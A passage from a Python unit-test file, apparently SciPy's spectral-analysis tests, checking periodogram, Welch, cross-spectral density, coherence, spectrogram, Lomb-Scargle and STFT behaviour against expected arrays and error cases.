q = np.full(16, 1/16.0, 'f')
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftfreq(16, 1.0))
q = np.full(16, 5.0/16.0, 'f')
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
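# Why the expected arrays look this way: for a length-N unit impulse the DFT
# is flat (|X[k]|**2 == 1), so the one-sided density is 2/N per bin with the
# DC and Nyquist bins not doubled; periodogram's default detrend='constant'
# removes the mean, which is what zeroes q[0] above. E.g. N = 16 gives
# interior bins of 1/8 and a Nyquist bin of 1/16.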
class TestWelch(object):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, welch, np.zeros(4, np.complex128),
scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = welch(x, nperseg=10, detrend=False)
f2, p2 = welch(x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = welch(x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = welch(x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = welch(x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, 10, 'hann', nperseg=8)
win = signal.get_window('hann', 8)
fe, pe = welch(x, 10, win, nperseg=None)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
assert_array_equal(fe.shape, (5,)) # because win length used as nperseg
assert_array_equal(pe.shape, (5,))
assert_raises(ValueError, welch, x,
10, win, nperseg=4) # because nperseg != win.shape[-1]
win_err = signal.get_window('hann', 32)
assert_raises(ValueError, welch, x,
10, win_err, nperseg=None) # win longer than signal
def test_empty_input(self):
f, p = welch([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = welch(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = welch(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
# For a string-like window, an input signal shorter than nperseg gives a
# UserWarning and sets nperseg to x.shape[-1].
with suppress_warnings() as sup:
sup.filter(UserWarning, "nperseg = 256 is greater than input length = 8, using nperseg = 8")
f, p = welch(x,window='hann') # default nperseg
f1, p1 = welch(x,window='hann', nperseg=256) # user-specified nperseg
f2, p2 = welch(x, nperseg=8) # valid nperseg, doesn't give warning
assert_allclose(f, f2)
assert_allclose(p, p2)
assert_allclose(f1, f2)
assert_allclose(p1, p2)
def test_window_long_or_nd(self):
assert_raises(ValueError, welch, np.zeros(4), 1, np.array([1,1,1,1,1]))
assert_raises(ValueError, welch, np.zeros(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = welch(x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, welch, np.zeros(4), 1, 'hann', 2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, welch, np.ones(12), nfft=3, nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477458, 0.23430935, 0.17072113, 0.17072116,
0.17072113], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
nfft = 24
f = fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
def test_window_correction(self):
A = 20
fs = 1e4
nperseg = int(fs//10)
fsig = 300
ii = int(fsig*nperseg//fs) # Freq index of fsig
tt = np.arange(fs)/fs
x = A*np.sin(2*np.pi*fsig*tt)
for window in ['hann', 'bartlett', ('tukey', 0.1), 'flattop']:
_, p_spec = welch(x, fs=fs, nperseg=nperseg, window=window,
scaling='spectrum')
freq, p_dens = welch(x, fs=fs, nperseg=nperseg, window=window,
scaling='density')
# Check peak height at signal frequency for 'spectrum'
assert_allclose(p_spec[ii], A**2/2.0)
# Check integrated spectrum RMS for 'density'
assert_allclose(np.sqrt(np.trapz(p_dens, freq)), A*np.sqrt(2)/2,
rtol=1e-3)
def test_axis_rolling(self):
np.random.seed(1234)
x_flat = np.random.randn(1024)
_, p_flat = welch(x_flat)
for a in range(3):
newshape = [1,]*3
newshape[a] = -1
x = x_flat.reshape(newshape)
_, p_plus = welch(x, axis=a) # Positive axis index
_, p_minus = welch(x, axis=a-x.ndim) # Negative axis index
assert_equal(p_flat, p_plus.squeeze(), err_msg=a)
assert_equal(p_flat, p_minus.squeeze(), err_msg=a-x.ndim)
def test_average(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, average='median')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([.1, .05, 0., 1.54074396e-33, 0.])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_raises(ValueError, welch, x, nperseg=8,
average='unrecognised-average')
class TestCSD:
def test_pad_shorter_x(self):
x = np.zeros(8)
y = np.zeros(12)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_pad_shorter_y(self):
x = np.zeros(12)
y = np.zeros(8)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477455, 0.23430933, 0.17072113, 0.17072113,
0.17072113])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, csd, np.zeros(4, np.complex128),
np.ones(4, np.complex128), scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = csd(x, x, nperseg=10, detrend=False)
f2, p2 = csd(x, x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = csd(x, x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = csd(x, x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[0,0,:], x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = csd(x, x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[:,0,0], x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, 10, 'hann', 8)
win = signal.get_window('hann', 8)
fe, pe = csd(x, x, 10, win, nperseg=None)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
assert_array_equal(fe.shape, (5,)) # because win length used as nperseg
assert_array_equal(pe.shape, (5,))
assert_raises(ValueError, csd, x, x,
10, win, nperseg=256) # because nperseg != win.shape[-1]
win_err = signal.get_window('hann', 32)
assert_raises(ValueError, csd, x, x,
10, win_err, nperseg=None) # because win longer than signal
def test_empty_input(self):
f, p = csd([],np.zeros(10))
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
f, p = csd(np.zeros(10),[])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.ones(10), np.empty((5,0)))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
f, p = csd(np.empty((5,0)), np.ones(10))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.empty((10,10,3)), np.zeros((10,0,1)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
f, p = csd(np.empty((10,0,1)), np.zeros((10,10,3)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
# For a string-like window, an input signal shorter than the nperseg value
# triggers a UserWarning and nperseg is reduced to x.shape[-1]
with suppress_warnings() as sup:
sup.filter(UserWarning, "nperseg = 256 is greater than input length = 8, using nperseg = 8")
f, p = csd(x, x, window='hann') # default nperseg
f1, p1 = csd(x, x, window='hann', nperseg=256) # user-specified nperseg
f2, p2 = csd(x, x, nperseg=8) # valid nperseg, doesn't give warning
assert_allclose(f, f2)
assert_allclose(p, p2)
assert_allclose(f1, f2)
assert_allclose(p1, p2)
def test_window_long_or_nd(self):
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.array([1,1,1,1,1]))
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = csd(x, x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1, 'hann',
2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, csd, np.ones(12), np.zeros(12), nfft=3,
nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.12477458, 0.23430935, 0.17072113, 0.17072116,
0.17072113], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
y = np.ones(12)
nfft = 24
f = fftfreq(nfft, 1.0)[:nfft//2+1]
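# as in TestWelch.test_padded_freqs: flip the negative Nyquist bin that fftfreq returns for even nfft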
f[-1] *= -1
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
class TestCoherence(object):
def test_identical_input(self):
x = np.random.randn(20)
y = np.copy(x) # So `y is x` -> False
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
def test_phase_shifted_input(self):
x = np.random.randn(20)
y = -x
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
class TestSpectrogram(object):
def test_average_all_segments(self):
x = np.random.randn(1024)
fs = 1.0
window = ('tukey', 0.25)
nperseg = 16
noverlap = 2
f, _, P = spectrogram(x, fs, window, nperseg, noverlap)
fw, Pw = welch(x, fs, window, nperseg, noverlap)
assert_allclose(f, fw)
assert_allclose(np.mean(P, axis=-1), Pw)
def test_window_external(self):
x = np.random.randn(1024)
fs = 1.0
window = ('tukey', 0.25)
nperseg = 16
noverlap = 2
f, _, P = spectrogram(x, fs, window, nperseg, noverlap)
win = signal.get_window(('tukey', 0.25), 16)
fe, _, Pe = spectrogram(x, fs, win, nperseg=None, noverlap=2)
assert_array_equal(fe.shape, (9,)) # because win length used as nperseg
assert_array_equal(Pe.shape, (9,73))
assert_raises(ValueError, spectrogram, x,
fs, win, nperseg=8) # because nperseg != win.shape[-1]
win_err = signal.get_window(('tukey', 0.25), 2048)
assert_raises(ValueError, spectrogram, x,
fs, win_err, nperseg=None) # win longer than signal
def test_short_data(self):
x = np.random.randn(1024)
fs = 1.0
# For a string-like window, an input signal shorter than the nperseg value
# triggers a UserWarning and nperseg is reduced to x.shape[-1]
f, _, p = spectrogram(x, fs, window=('tukey',0.25)) # default nperseg
with suppress_warnings() as sup:
sup.filter(UserWarning,
"nperseg = 1025 is greater than input length = 1024, using nperseg = 1024")
f1, _, p1 = spectrogram(x, fs, window=('tukey',0.25),
nperseg=1025) # user-specified nperseg
f2, _, p2 = spectrogram(x, fs, nperseg=256) # to compare w/default
f3, _, p3 = spectrogram(x, fs, nperseg=1024) # compare w/user-spec'd
assert_allclose(f, f2)
assert_allclose(p, p2)
assert_allclose(f1, f3)
assert_allclose(p1, p3)
class TestLombscargle(object):
def test_frequency(self):
"""Test if frequency location of peak corresponds to frequency of
generated input signal.
"""
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Generate a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
P = lombscargle(t, x, f)
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
delta = f[1] - f[0]
assert_(abs(w - f[np.argmax(P)]) < (delta/2.))
def test_amplitude(self):
# Test if height of peak in normalized Lomb-Scargle periodogram
# corresponds to amplitude of the generated input signal.
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Generate a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f)
# Normalize
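# For N samples of a sinusoid of amplitude A the periodogram peak is about N*A**2/4, so sqrt(4*pgram/N) recovers A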
pgram = np.sqrt(4 * pgram / t.shape[0])
# Check if the height of the periodogram peak corresponds to the
# amplitude of the generated input signal
assert_approx_equal(np.max(pgram), ampl, significant=2)
def test_precenter(self):
# Test that precenter gives the same result as manually pre-centering.
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
offset = 0.15 # Offset to be subtracted in pre-centering
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Generate an offset sine wave for the selected times
x = ampl * np.sin(w*t + phi) + offset
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f, precenter=True)
pgram2 = lombscargle(t, x - x.mean(), f, precenter=False)
# check if centering worked
assert_allclose(pgram, pgram2)
def test_normalize(self):
# Test normalize option of Lomb-Scargle.
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Generate a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f)
pgram2 = lombscargle(t, x, f, normalize=True)
# check if normalization works as expected
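# normalize=True scales the periodogram by 2/sum(x**2), so the peak for a pure sinusoid approaches 1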
assert_allclose(pgram * 2 / np.dot(x, x), pgram2)
assert_approx_equal(np.max(pgram2), 1.0, significant=2)
def test_wrong_shape(self):
t = np.linspace(0, 1, 1)
x = np.linspace(0, 1, 2)
f = np.linspace(0, 1, 3)
assert_raises(ValueError, lombscargle, t, x, f)
def test_zero_division(self):
t = np.zeros(1)
x = np.zeros(1)
f = np.zeros(1)
assert_raises(ZeroDivisionError, lombscargle, t, x, f)
def test_lombscargle_atan_vs_atan2(self):
# https://github.com/scipy/scipy/issues/3787
# This raised a ZeroDivisionError.
t = np.linspace(0, 10, 1000, endpoint=False)
x = np.sin(4*t)
f = np.linspace(0, 50, 500, endpoint=False) + 0.1
lombscargle(t, x, f*2*np.pi)
class TestSTFT(object):
def test_input_validation(self):
assert_raises(ValueError, check_COLA, 'hann', -10, 0)
assert_raises(ValueError, check_COLA, 'hann', 10, 20)
assert_raises(ValueError, check_COLA, np.ones((2,2)), 10, 0)
assert_raises(ValueError, check_COLA, np.ones(20), 10, 0)
assert_raises(ValueError, check_NOLA, 'hann', -10, 0)
assert_raises(ValueError, check_NOLA, 'hann', 10, 20)
assert_raises(ValueError, check_NOLA, np.ones((2,2)), 10, 0)
assert_raises(ValueError, check_NOLA, np.ones(20), 10, 0)
assert_raises(ValueError, check_NOLA, 'hann', 64, -32)
x = np.zeros(1024)
z = np.array(stft(x), dtype=object)
assert_raises(ValueError, stft, x, window=np.ones((2,2)))
assert_raises(ValueError, stft, x, window=np.ones(10), nperseg=256)
assert_raises(ValueError, stft, x, nperseg=-256)
assert_raises(ValueError, stft, x, nperseg=256, noverlap=1024)
assert_raises(ValueError, stft, x, nperseg=256, nfft=8)
assert_raises(ValueError, istft, x) # Not 2d
assert_raises(ValueError, istft, z, window=np.ones((2,2)))
assert_raises(ValueError, istft, z, window=np.ones(10), nperseg=256)
assert_raises(ValueError, istft, z, nperseg=-256)
assert_raises(ValueError, istft, z, nperseg=256, noverlap=1024)
assert_raises(ValueError, istft, z, nperseg=256, nfft=8)
assert_raises(ValueError, istft, z, nperseg=256, noverlap=0,
window='hann') # Doesn't meet COLA
assert_raises(ValueError, istft, z, time_axis=0, freq_axis=0)
assert_raises(ValueError, _spectral_helper, x, x, mode='foo')
